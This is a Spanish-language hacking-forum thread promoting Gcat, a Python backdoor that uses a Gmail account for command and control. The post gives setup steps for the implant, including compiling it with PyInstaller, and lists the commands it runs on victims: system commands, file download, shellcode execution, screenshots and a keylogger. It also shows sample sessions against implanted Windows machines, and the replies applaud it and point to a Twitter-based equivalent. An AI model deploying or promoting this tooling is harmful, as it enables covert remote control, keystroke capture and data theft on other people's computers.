Gcat - Python Backdoor Usando Gmail para Mando y Control

Iniciado por R3v0lve, Septiembre 21, 2015, 02:53:46 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Gcat es un backdoor Python sigiloso que utiliza Gmail como un servidor de comando y control. Es bastante básico en este momento, pero es una interesante prueba de concepto y si la comunidad se puso detrás de ella y contribuyó algunas nuevas características que podría ser una muy poderosa pieza de equipo.


Gcat es un backdoor Python sigiloso

Cuanto a prestaciones que no tiene que mucho, no puedes subir archivos todavía, pero usted puede ejecutar código shell, descargar archivos y capturas de pantalla de captura.

Pero como concepto es genial, el tráfico de correo electrónico? ¿Cuántas organizaciones bloquearán que, sobre todo a los servidores de Google. Camino menos visible que el tráfico típico de IRC.

Setup

Configuración

Para que esto funcione se necesita:

     Una cuenta de Gmail (Utilice una cuenta dedicada! No utilice su ser personal!)
     Encienda "Permitir aplicaciones menos seguras" en virtud de la configuración de seguridad de la cuenta

Este repo contiene dos archivos:


     No tienes permitido ver los links. Registrarse o Entrar a mi cuenta una secuencia de comandos que se utiliza para enumerar y tema ordena a los clientes disponibles
     No tienes permitido ver los links. Registrarse o Entrar a mi cuenta la puerta trasera real de implementar

En ambos archivos, editar los gmail_user y gmail_pwd variables con el nombre de usuario y la contraseña de la cuenta que previamente configuración.

Usted está probablemente va a querer compilar No tienes permitido ver los links. Registrarse o Entrar a mi cuenta en un archivo ejecutable utilizando PyInstaller.

Opciones

Código: php
Gcat

optional arguments:
  -h, --help            show this help message and exit
  -v, --version         show program's version number and exit
  -id ID                Client to target
  -jobid JOBID          Job id to retrieve

  -list                 List available clients
  -info                 Retrieve info on specified client

Commands:
  Commands to execute on an implant

  -cmd CMD              Execute a system command
  -download PATH        Download a file from a clients system
  -exec-shellcode FILE  Execute supplied shellcode on a client
  -screenshot           Take a screenshot
  -lock-screen          Lock the clients screen
  -force-checkin        Force a check in
  -start-keylogger      Start keylogger
  -stop-keylogger       Stop keylogger


Usando Gcat

Código: php
#~ python gcat.py -list
f964f907-dfcb-52ec-a993-543f6efc9e13 Windows-8-6.2.9200-x86
90b2cd83-cb36-52de-84ee-99db6ff41a11 Windows-XP-5.1.2600-SP3-x86


Una vez que haya implementado la puerta de atrás en un par de sistemas, puede comprobar los clientes disponibles utilizando el comando list:

La salida es una cadena UUID que identifica de forma exclusiva el sistema y el sistema operativo el implante se está ejecutando en

Vamos a emitir un comando a un implante:

Código: php
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -cmd 'ipconfig /all'
[*] Command sent successfully with jobid: SH3C4gv


Aquí le estamos diciendo 90b2cd83-cb36-52de-84ee-99db6ff41a11 ejecutar ipconfig / all, el guión y luego da salida a la JobID que podemos utilizar para recuperar la salida de ese comando

Permite obtener los resultados!

Código: php
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -jobid SH3C4gv  
DATE: 'Tue, 09 Jun 2015 06:51:44 -0700 (PDT)'
JOBID: SH3C4gv
FG WINDOW: 'Command Prompt - C:\Python27\python.exe implant.py'
CMD: 'ipconfig /all'


Windows IP Configuration

        Host Name . . . . . . . . . . . . : unknown-2d44b52
        Primary Dns Suffix  . . . . . . . :
        Node Type . . . . . . . . . . . . : Unknown
        IP Routing Enabled. . . . . . . . : No
        WINS Proxy Enabled. . . . . . . . : No

-- SNIP --


Downlaod Github : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
FUENTES: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Ми повинні мати віру в себе. У цьому і полягає секрет. Навіть коли я був у дитячому будинку і ходили по вулицях у пошуках їжі, щоб жити, навіть тоді, я вважав найбільшим актором в світі. Без абсолютної впевненості, один приречена на провал.

Que buen aporte @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta!! Muchisimas gracias!
Te dejaré +c0in

Saludos!
ANTRAX


Noviembre 18, 2015, 08:52:40 PM #2 Ultima modificación: Noviembre 18, 2015, 08:55:10 PM por Stuxnet
:3 Muy lindo, hay algo parecido pero utilizando twitter, pueden leer sobre eso aquí para los interesados

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta